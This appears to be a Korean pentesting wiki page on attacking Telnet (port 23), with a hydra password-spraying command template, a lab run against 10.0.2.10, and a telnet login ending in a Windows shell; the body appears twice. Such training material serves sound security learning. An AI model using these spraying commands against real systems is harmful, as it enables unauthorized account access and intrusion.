23 - Telnet

Telnet은 원격 시스템에 접속하여 커맨드 실행이 가능한 프로토콜입니다. 현재는 암호화가 적용된 원격 명령 프로토콜인 SSH에 밀리지만 그럼에도 디버깅 용도로 사용하는 경우가 종종 있습니다. 대상 서버에 Telnet이 활성화 되어 있다면 패스워드 스프레잉 공격, 계정 정보를 획득 시 원격 명령 실행 등이 가능합니다.

Password Spraying

# 명령어 양식
hydra -L <username.txt> -p <PASS> telnet://<IP>

# 실습
┌──(root㉿kali)-[~/Pentest/Scripts]
└─# hydra -L username.txt -p 'PentestingWiki' telnet://10.0.2.10 -V -f      
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-14 07:42:21
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:26/p:1), ~2 tries per task
[DATA] attacking telnet://10.0.2.10:23/
[ATTEMPT] target 10.0.2.10 - login "root" - pass "PentestingWiki" - 1 of 26 [child 0] (0/0)
[ATTEMPT] target 10.0.2.10 - login "admin" - pass "PentestingWiki" - 2 of 26 [child 1] (0/0)
[ATTEMPT] target 10.0.2.10 - login "test" - pass "PentestingWiki" - 3 of 26 [child 2] (0/0)
[ATTEMPT] target 10.0.2.10 - login "guest" - pass "PentestingWiki" - 4 of 26 [child 3] (0/0)
...

Shell Connection

┌──(root㉿kali)-[~/Pentest/Machine]
└─# telnet 10.0.2.10
Trying 10.0.2.10...
Connected to 10.0.2.10.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: wiki
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
pentesting\wiki

Previous25 - SMTP Next53 - DNS

Last updated 1 month ago

Was this helpful?

Password Spraying

# 명령어 양식
hydra -L <username.txt> -p <PASS> telnet://<IP>

# 실습
┌──(root㉿kali)-[~/Pentest/Scripts]
└─# hydra -L username.txt -p 'PentestingWiki' telnet://10.0.2.10 -V -f      
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-14 07:42:21
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:26/p:1), ~2 tries per task
[DATA] attacking telnet://10.0.2.10:23/
[ATTEMPT] target 10.0.2.10 - login "root" - pass "PentestingWiki" - 1 of 26 [child 0] (0/0)
[ATTEMPT] target 10.0.2.10 - login "admin" - pass "PentestingWiki" - 2 of 26 [child 1] (0/0)
[ATTEMPT] target 10.0.2.10 - login "test" - pass "PentestingWiki" - 3 of 26 [child 2] (0/0)
[ATTEMPT] target 10.0.2.10 - login "guest" - pass "PentestingWiki" - 4 of 26 [child 3] (0/0)
...

Shell Connection

┌──(root㉿kali)-[~/Pentest/Machine]
└─# telnet 10.0.2.10
Trying 10.0.2.10...
Connected to 10.0.2.10.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: wiki
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
pentesting\wiki